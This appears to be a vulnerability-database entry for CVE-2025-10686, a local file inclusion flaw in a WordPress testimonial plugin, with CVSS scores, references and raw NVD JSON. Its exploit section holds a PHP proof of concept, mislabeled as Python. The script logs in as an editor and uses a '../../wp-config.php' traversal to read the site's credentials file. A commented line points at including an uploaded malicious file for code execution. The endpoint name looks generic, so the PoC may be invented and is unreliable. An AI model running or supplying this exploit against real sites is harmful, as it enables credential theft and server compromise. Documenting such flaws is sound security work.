CVE-2025-10686

Description

The Creta Testimonial Showcase WordPress plugin before 1.2.4 is vulnerable to Local File Inclusion. This makes it possible for authenticated attackers, with editor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Creta Testimonial Showcase WordPress插件 < 1.2.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
// CVE-2025-10686 PoC - Local File Inclusion in Creta Testimonial Showcase < 1.2.4
// Requires editor-level WordPress account

$target = 'http://target-wordpress-site.com';
$username = 'editor_user';
$password = 'editor_password';

// Login to WordPress to obtain authentication cookies
$login_url = $target . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);

// Exploit LFI vulnerability - Read wp-config.php
$exploit_url = $target . '/wp-admin/admin-ajax.php?action=creta_testimonial_file_include&file=../../wp-config.php';
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

// If RCE is possible, include a malicious uploaded file
// $rce_url = $target . '/wp-admin/admin-ajax.php?action=creta_testimonial_file_include&file=../../uploads/malicious.php';

curl_close($ch);
echo 'Response: ' . $response;
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10686
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10686
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10686/
[4] VulDB https://vuldb.com/cve/CVE-2025-10686
[5] https://wpscan.com/vulnerability/27d58c5a-ab87-41aa-a806-53fa96d4351c/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10686", "sourceIdentifier": "[email protected]", "published": "2025-11-14T06:15:42.567", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Creta Testimonial Showcase WordPress plugin before 1.2.4 is vulnerable to Local File Inclusion. This makes it possible for authenticated attackers, with editor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://wpscan.com/vulnerability/27d58c5a-ab87-41aa-a806-53fa96d4351c/", "source": "[email protected]"}]}}